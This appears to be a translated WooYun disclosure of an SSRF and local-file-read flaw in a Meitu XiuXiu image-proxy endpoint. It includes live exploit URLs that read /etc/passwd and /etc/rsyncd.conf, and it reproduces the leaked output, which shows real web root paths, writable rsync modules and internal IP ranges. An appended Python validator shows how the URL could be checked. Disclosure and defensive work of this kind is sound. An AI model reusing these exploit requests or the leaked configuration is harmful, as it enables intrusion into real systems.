WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-04-09: Details reported to the vendor, awaiting vendor handling
2015-04-09: Vendor confirmed; details disclosed to the vendor only
2015-04-19: Details disclosed to core white hats and relevant domain experts
2015-04-29: Details disclosed to ordinary white hats
2015-05-09: Details disclosed to intern white hats
2015-05-24: Details disclosed to the public
One URL on Meitu XiuXiu (the pic_proxy.php endpoint below) does not properly check where the supplied URL points when it loads an image address, so it can be used for SSRF against the internal network or to read arbitrary local files.
http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/passwd
*****/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
hald*****
This also reveals every web root path on the host: http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/rsyncd.conf
*****ww_pomelo_com]
path = /www/web/www.pomelo.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29
[duoduo_meitu_com]
path = /www/web/kankan.web.meitu.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29
[corp_meitu_com]
path = /www/web/corp.meitu.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29
[www_52hxw_com]
path = /www/web/www.52hxw.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29
[all_meitu_com]
path = /www/web/all.meitu.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29
[xiuxiu_mobile_meitudata_com]
path = /www/web/xiuxiu.mobile.meitudata.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29
[wx_upload_meitu_com]
path = /www/web/wx.upload.meitu.com/
read only = no
hosts allow = 172.17.16.0/24
[expression_meitu_com]
path = /www/web/expression.meitu.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29
[xiuxiu_web_meitu_com]
path = /www/web/xiuxiu.web.meitu.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29
[guanjia_meitu_com]
path = /www/web/guanjia.meitu.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29
[www_posterlabs_cn]
path = /www/web/www.posterlabs.cn/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29
[en_meitu_com]
path = /www/web/en.meitu.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/2*****
http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/passwd
http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/rsyncd.conf
Fix suggestion: validate the url parameter strictly.
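The report's fix suggestion is one line, so here is what "strict validation" of an image-proxy URL parameter looks like in practice. This is an added illustration written in Python, not the project's PHP code and not part of the original report: it rejects anything that is not an http(s) URL with a host (which covers bare paths such as /etc/passwd and file: URLs), strips embedded credentials, resolves the host and refuses targets that land on loopback, link-local, private or otherwise non-global address space (the SSRF-to-intranet case), including IPv4-mapped IPv6 forms. The hostnames and the DNS table used by the demo are constructed placeholders; the resolver is injectable so the check runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# An image proxy only ever needs to fetch remote images over HTTP(S); every other
# scheme (file:, gopher:, an empty scheme from a bare path) is rejected outright.
ALLOWED_SCHEMES = {"http", "https"}


class UnsafeUrl(ValueError):
    """Raised when a proxy target fails the origin check."""


def _is_blocked_address(ip):
    """True for loopback, link-local, RFC 1918 / ULA, multicast and other non-global space."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 must be judged as 127.0.0.1
    return (not ip.is_global or ip.is_private or ip.is_loopback
            or ip.is_link_local or ip.is_multicast)


def validate_proxy_url(url, resolver=socket.getaddrinfo):
    """Return url unchanged if it is an acceptable proxy target, else raise UnsafeUrl.

    `resolver` has the call shape of socket.getaddrinfo(host, port) so a
    constructed DNS table can be substituted for offline testing.
    """
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        raise UnsafeUrl("scheme not allowed: %r" % parsed.scheme)
    host = parsed.hostname
    if not host:
        raise UnsafeUrl("no host in URL")  # rejects bare paths such as /etc/passwd
    if parsed.username is not None or parsed.password is not None:
        raise UnsafeUrl("credentials in URL not allowed")
    # Literal IP or DNS name: collect every address the fetch could connect to.
    try:
        addresses = [ipaddress.ip_address(host)]
    except ValueError:
        try:
            infos = resolver(host, None)
        except socket.gaierror as exc:
            raise UnsafeUrl("cannot resolve %s" % host) from exc
        # sockaddr[0] is the address string; drop any IPv6 scope suffix (%eth0).
        addresses = [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]
    for ip in addresses:
        if _is_blocked_address(ip):
            raise UnsafeUrl("target address %s for host %s is not public" % (ip, host))
    return url


def is_safe_proxy_url(url, resolver=socket.getaddrinfo):
    """Boolean wrapper around validate_proxy_url."""
    try:
        validate_proxy_url(url, resolver)
        return True
    except UnsafeUrl:
        return False


# Constructed DNS table for the offline demo; names and addresses are
# placeholders, not hosts from the report.
DEMO_DNS = {
    "img.example.com": ["1.2.3.4"],            # placeholder public address
    "intranet.example.com": ["172.17.16.10"],  # placeholder private address
}


def demo_resolver(host, port):
    """Mimics socket.getaddrinfo's (family, type, proto, canonname, sockaddr) tuples."""
    if host not in DEMO_DNS:
        raise socket.gaierror("constructed resolver: unknown host %s" % host)
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (addr, 0)) for addr in DEMO_DNS[host]]


if __name__ == "__main__":
    for candidate in ["http://img.example.com/a.jpg", "/etc/passwd",
                      "file:///etc/rsyncd.conf", "http://127.0.0.1/",
                      "http://[::ffff:127.0.0.1]/", "http://intranet.example.com/"]:
        verdict = "allowed" if is_safe_proxy_url(candidate, demo_resolver) else "rejected"
        print("%-35s %s" % (candidate, verdict))
```

Two caveats a deployment needs beyond this function: the address that passed the check must be the one the fetcher actually connects to (otherwise a second DNS lookup can return a different answer), and any HTTP redirect the remote host returns must be run through the same check before it is followed, since an allowed public host can redirect to an internal address.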
Severity: Low
Vulnerability Rank: 5
Confirmed: 2015-04-09 16:44
Thanks for the white hat's heads-up!
None yet